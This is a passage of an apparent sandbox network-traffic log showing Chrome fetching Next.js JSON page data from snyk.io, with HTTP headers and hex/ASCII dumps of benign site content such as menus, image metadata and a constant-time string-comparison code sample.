                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC12823INData Raw: 30 30 30 30 33 32 30 42 0d 0a 79 73 22 3a 7b 22 69 64 22 3a 22 34 39 45 77 6f 4f 6e 49 41 4d 70 53 6d 76 57 43 4d 32 35 5a 37 43 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 50 72 69 6d 61 72 79 4e 61 76 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 43 6f 6d 70 61 6e 79 22 2c 22 75 72 6c 22 3a 6e 75 6c 6c 2c 22 64 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 61 74 65 67 6f 72 69 65 73 22 3a 7b 22 69 74 65 6d 73 22 3a 5b 5d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 50 72 69 6d 61 72 79 4e 61 76 49 74 65 6d 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 61 74 65 67 6f 72 69 65 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 7d 2c 22 64 72 6f 70 64 6f 77 6e 4d 65
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000320Bys":{"id":"49EwoOnIAMpSmvWCM25Z7C","__typename":"Sys"},"__typename":"NavigationPrimaryNavItem","label":"Company","url":null,"dropdownMenuCategories":{"items":[],"__typename":"NavigationPrimaryNavItemDropdownMenuCategoriesCollection"},"dropdownMe
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              76192.168.2.54982123.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC485OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/open-source-security-management.json?slug=product&slug=open-source-security-management HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC651INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"yk84ej87cw35xh"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/open-source-security-management.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::iad1::fdb88-1729799349030-ea7e89bc288a
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:09 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799349.10946e0
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC15733INData Raw: 30 30 30 30 36 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 34 6c 4f 71 59 52 4e 5a 72 49 36 72 4d 49 4a 46 75 44 67 76 68 68 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 30 2d 32 30 54 30 30 3a 34 38 3a 35 36 2e 32 30 35 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 39 2d 32 32 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"4lOqYRNZrI6rMIJFuDgvhh","type":"Entry","createdAt":"2022-10-20T00:48:56.205Z","updatedAt":"2023-09-22T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC8855INData Raw: 6e 74 2c 20 66 72 6f 6d 20 72 65 6d 65 64 69 61 74 69 6f 6e 20 74 6f 20 72 65 70 6f 72 74 69 6e 67 2e 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 64 6f 63 75 6d 65 6e 74 22 7d 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 74 69 74 6c 65 54 65 78 74 22 3a 7b 7d 7d 7d 7d 2c 22 72 6f 77 73 22 3a 5b 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a
                                                                                                                                                                                                                                                                                                              Data Ascii: nt, from remediation to reporting.","nodeType":"text"}],"nodeType":"paragraph"}],"nodeType":"document"},"appearance":{"titleText":{}}}},"rows":[{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adz
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 34 31 51 38 38 74 78 51 6b 6c 6d 66 51 41 69 78 79 65 58 37 47 42 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 30 2d 32 30 54 30 30 3a 34 38 3a 35 36 2e 39 36 35 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 37 2d 31 31 54 31 38 3a 31 37 3a 32 38 2e 38 35 35 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 33 33 2c 22 72 65 76 69 73 69 6f 6e 22 3a 38 2c 22
                                                                                                                                                                                                                                                                                                              Data Ascii: 000060003adzz"}},"id":"41Q88txQklmfQAixyeX7GB","type":"Entry","createdAt":"2022-10-20T00:48:56.965Z","updatedAt":"2024-07-11T18:17:28.855Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":33,"revision":8,"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC8204INData Raw: 74 61 64 61 74 61 22 3a 5b 5d 2c 22 70 75 62 6c 69 63 5f 69 64 22 3a 22 73 74 75 61 72 74 2d 6c 61 72 73 65 6e 2d 6d 6f 6e 67 6f 64 62 22 2c 22 63 72 65 61 74 65 64 5f 61 74 22 3a 22 32 30 32 30 2d 30 35 2d 31 31 54 31 34 3a 34 37 3a 30 31 5a 22 2c 22 73 65 63 75 72 65 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 73 2e 63 6c 6f 75 64 69 6e 61 72 79 2e 63 6f 6d 2f 73 6e 79 6b 2f 69 6d 61 67 65 2f 75 70 6c 6f 61 64 2f 76 31 35 38 39 32 30 38 34 32 31 2f 73 74 75 61 72 74 2d 6c 61 72 73 65 6e 2d 6d 6f 6e 67 6f 64 62 2e 70 6e 67 22 2c 22 6f 72 69 67 69 6e 61 6c 5f 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 72 65 73 2e 63 6c 6f 75 64 69 6e 61 72 79 2e 63 6f 6d 2f 73 6e 79 6b 2f 69 6d 61 67 65 2f 75 70 6c 6f 61 64 2f 76 31 35 38 39 32 30 38 34 32 31 2f 73 74
                                                                                                                                                                                                                                                                                                              Data Ascii: tadata":[],"public_id":"stuart-larsen-mongodb","created_at":"2020-05-11T14:47:01Z","secure_url":"https://res.cloudinary.com/snyk/image/upload/v1589208421/stuart-larsen-mongodb.png","original_url":"http://res.cloudinary.com/snyk/image/upload/v1589208421/st
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 69 6f 6e 22 3a 34 32 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 63 6f 6e 74 65 6e 74 54 65 78 74 53 69 6e 67 6c 65 4c 69 6e 65 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 74 65 78 74 22 3a 22 4a 69 72 61 20 69 6e 74 65 67 72 61 74 69 6f 6e 22 7d 7d 5d 2c 22 61 63 74 69 6f 6e 73 22 3a 5b 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000ion":42,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"contentTextSingleLine"}},"locale":"en-US"},"fields":{"text":"Jira integration"}}],"actions":[{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","l
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC12INData Raw: 76 61 6c 75 65 22 3a 22 30 78 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: value":"0x
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 52 69 63 6b 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 68 79 70 65 72 6c 69 6e 6b 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 69 74 61 6c 69 63 22 7d 5d 2c 22 76 61 6c 75 65 22 3a 22 2c 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 20 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 69 74 61 6c 69 63 22 7d 5d 2c 22 76 61 6c 75 65 22 3a 22 61 73 20 73 65 65 6e 20 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000Rick","nodeType":"text"}],"nodeType":"hyperlink"},{"data":{},"marks":[{"type":"italic"}],"value":",","nodeType":"text"},{"data":{},"marks":[],"value":" ","nodeType":"text"},{"data":{},"marks":[{"type":"italic"}],"value":"as seen ","nodeType":"te
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC12INData Raw: 20 55 3b 20 69 20 3c 20 6c 65 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: U; i < le
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 6e 3b 20 69 2b 2b 29 5c 6e 20 20 20 7b 5c 6e 20 20 20 20 20 64 20 7c 3d 20 62 31 5b 69 5d 20 5e 20 62 32 5b 69 5d 3b 5c 6e 20 20 20 7d 5c 6e 20 20 20 72 65 74 75 72 6e 20 28 69 6e 74 29 28 28 31 20 26 28 28 64 20 2d 20 31 29 20 3e 3e 20 38 29 29 20 2d 20 31 29 3b 5c 6e 7d 5c 6e 5c 6e 69 6e 74 20 70 75 72 65 5f 73 74 72 63 6d 70 28 63 6f 6e 73 74 20 63 68 61 72 20 2a 63 6f 6e 73 74 20 73 31 2c 20 63 6f 6e 73 74 20 63 68 61 72 20 2a 63 6f 6e 73 74 20 73 32 29 5c 6e 7b 5c 6e 20 20 72 65 74 75 72 6e 20 70 75 72 65 5f 6d 65 6d 63 6d 70 28 73 31 2c 20 73 32 2c 20 73 74 72 6c 65 6e 28 73 31 29 20 2b 20 31 20 55 29 3b 5c 6e 7d 22 7d 7d 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 65 6d 62 65 64 64
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000n; i++)\n {\n d |= b1[i] ^ b2[i];\n }\n return (int)((1 &((d - 1) >> 8)) - 1);\n}\n\nint pure_strcmp(const char *const s1, const char *const s2)\n{\n return pure_memcmp(s1, s2, strlen(s1) + 1 U);\n}"}}},"content":[],"nodeType":"embedd
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC8204INData Raw: 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 42 69 69 61 69 6a 54 59 51 31 34 52 61 7a 66 46 67 38 55 4d 63 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 31 2d 30 38 54 31 35 3a 35 38 3a 32 34 2e 32 34 37 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 35 2d 33 30 54 30 34 3a 31 35 3a 32 31 2e 38 31 36 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c
                                                                                                                                                                                                                                                                                                              Data Ascii: :[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"BiiaijTYQ14RazfFg8UMc","type":"Entry","createdAt":"2022-11-08T15:58:24.247Z","updatedAt":"2024-05-30T04:15:21.816Z","environment":{"sys":{"id":"master","type":"Link",


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              77192.168.2.54982423.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC485OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/infrastructure-as-code-security.json?slug=product&slug=infrastructure-as-code-security HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC651INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"43dnmi6kfg1n5m"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/infrastructure-as-code-security.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::iad1::7gpss-1729799349047-9e2f2ab5dea8
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:09 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799349.10946f5
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC15733INData Raw: 30 30 30 30 36 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 32 69 36 57 64 4c 64 52 59 65 44 41 35 69 4f 34 4b 4a 41 4b 4d 62 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 30 2d 32 31 54 30 35 3a 32 38 3a 32 33 2e 35 30 37 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 37 2d 32 36 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"2i6WdLdRYeDA5iO4KJAKMb","type":"Entry","createdAt":"2022-10-21T05:28:23.507Z","updatedAt":"2024-07-26T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC8855INData Raw: 36 30 35 38 34 38 2f 77 65 62 73 69 74 65 2d 63 75 73 74 6f 6d 65 72 2d 6c 6f 67 6f 73 2f 6c 6f 67 6f 2d 61 77 73 2e 73 76 67 22 2c 22 72 65 73 6f 75 72 63 65 5f 74 79 70 65 22 3a 22 69 6d 61 67 65 22 2c 22 72 61 77 5f 74 72 61 6e 73 66 6f 72 6d 61 74 69 6f 6e 22 3a 22 22 7d 5d 2c 22 6c 6f 67 6f 49 63 6f 6e 4f 6e 6c 79 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 72 65 73 2e 63 6c 6f 75 64 69 6e 61 72 79 2e 63 6f 6d 2f 73 6e 79 6b 2f 69 6d 61 67 65 2f 75 70 6c 6f 61 64 2f 76 31 36 37 37 36 30 35 38 34 38 2f 77 65 62 73 69 74 65 2d 63 75 73 74 6f 6d 65 72 2d 6c 6f 67 6f 73 2f 6c 6f 67 6f 2d 61 77 73 2e 73 76 67 22 2c 22 74 61 67 73 22 3a 5b 5d 2c 22 74 79 70 65 22 3a 22 75 70 6c 6f 61 64 22 2c 22 62 79 74 65 73 22 3a 36 31 35 31 2c 22 77 69 64 74
                                                                                                                                                                                                                                                                                                              Data Ascii: 605848/website-customer-logos/logo-aws.svg","resource_type":"image","raw_transformation":""}],"logoIconOnly":[{"url":"http://res.cloudinary.com/snyk/image/upload/v1677605848/website-customer-logos/logo-aws.svg","tags":[],"type":"upload","bytes":6151,"widt
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 2f 75 70 6c 6f 61 64 2f 76 31 36 37 34 36 39 31 34 33 30 2f 6c 6f 67 6f 69 63 6f 6e 2d 6b 75 62 65 72 6e 65 74 65 73 2e 73 76 67 22 2c 22 74 61 67 73 22 3a 5b 5d 2c 22 74 79 70 65 22 3a 22 75 70 6c 6f 61 64 22 2c 22 62 79 74 65 73 22 3a 38 37 33 30 2c 22 77 69 64 74 68 22 3a 35 31 2c 22 66 6f 72 6d 61 74 22 3a 22 73 76 67 22 2c 22 68 65 69 67 68 74 22 3a 34 38 2c 22 76 65 72 73 69 6f 6e 22 3a 31 36 37 34 36 39 31 34 33 30 2c 22 64 75 72 61 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 6d 65 74 61 64 61 74 61 22 3a 5b 5d 2c 22 70 75 62 6c 69 63 5f 69 64 22 3a 22 6c 6f 67 6f 69 63 6f 6e 2d 6b 75 62 65 72 6e 65 74 65 73 22 2c 22 63 72 65 61 74 65 64 5f 61 74 22 3a 22 32 30 32 33 2d 30 31 2d 32 36 54 30 30 3a 30 33 3a 35 30 5a 22 2c 22 73
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000/upload/v1674691430/logoicon-kubernetes.svg","tags":[],"type":"upload","bytes":8730,"width":51,"format":"svg","height":48,"version":1674691430,"duration":null,"metadata":[],"public_id":"logoicon-kubernetes","created_at":"2023-01-26T00:03:50Z","s
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC8204INData Raw: 65 64 41 74 22 3a 22 32 30 32 34 2d 30 37 2d 31 35 54 31 35 3a 34 39 3a 30 37 2e 38 31 32 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 31 32 37 2c 22 72 65 76 69 73 69 6f 6e 22 3a 32 35 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 61 74 6f 6d 42 75 74 74 6f 6e 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a
                                                                                                                                                                                                                                                                                                              Data Ascii: edAt":"2024-07-15T15:49:07.812Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":127,"revision":25,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"atomButton"}},"locale":"en-US"},"fields":
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 3a 7b 22 63 6f 6c 6f 72 53 63 68 65 6d 65 22 3a 22 64 61 72 6b 2d 70 75 72 70 6c 65 22 7d 7d 7d 7d 5d 7d 7d 5d 7d 7d 2c 22 6d 65 6e 75 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 50 72 69 6d 61 72 79 22 2c 22 63 75 73 74 6f 6d 4c 6f 67 6f 22 3a 6e 75 6c 6c 2c 22 63 75 73 74 6f 6d 4c 6f 67 6f 4c 69 6e 6b 22 3a 6e 75 6c 6c 2c 22 61 63 74 69 6f 6e 73 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 50 72 69 6d 61 72 79 41 63 74 69 6f 6e 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 31 45 62 67 72 6d 6d 67 55 56 49 72 55 32 76 50 65 67 33 4d 4d 35 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000:{"colorScheme":"dark-purple"}}}}]}}]}},"menu":{"__typename":"NavigationPrimary","customLogo":null,"customLogoLink":null,"actions":{"__typename":"NavigationPrimaryActionsCollection","items":[{"sys":{"id":"1EbgrmmgUVIrU2vPeg3MM5","__typename":"Sy
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC12INData Raw: 6f 6e 22 2c 22 69 74 65 6d 73 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: on","items
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC11152INData Raw: 30 30 30 30 32 42 38 34 0d 0a 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 37 6b 35 51 66 6e 68 36 71 4a 39 35 6b 65 31 41 46 39 55 5a 38 65 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 22 2c 22 6c 61 62 65 6c 22 3a 6e 75 6c 6c 2c 22 73 70 6f 74 6c 69 67 68 74 46 69 72 73 74 49 74 65 6d 22 3a 66 61 6c 73 65 2c 22 74 69 74 6c 65 54 65 78 74 22 3a 6e 75 6c 6c 2c 22 73 75 62 6d 65 6e 75 4c 69 6e 6b 73 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 49 74 65 6d 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 22 69
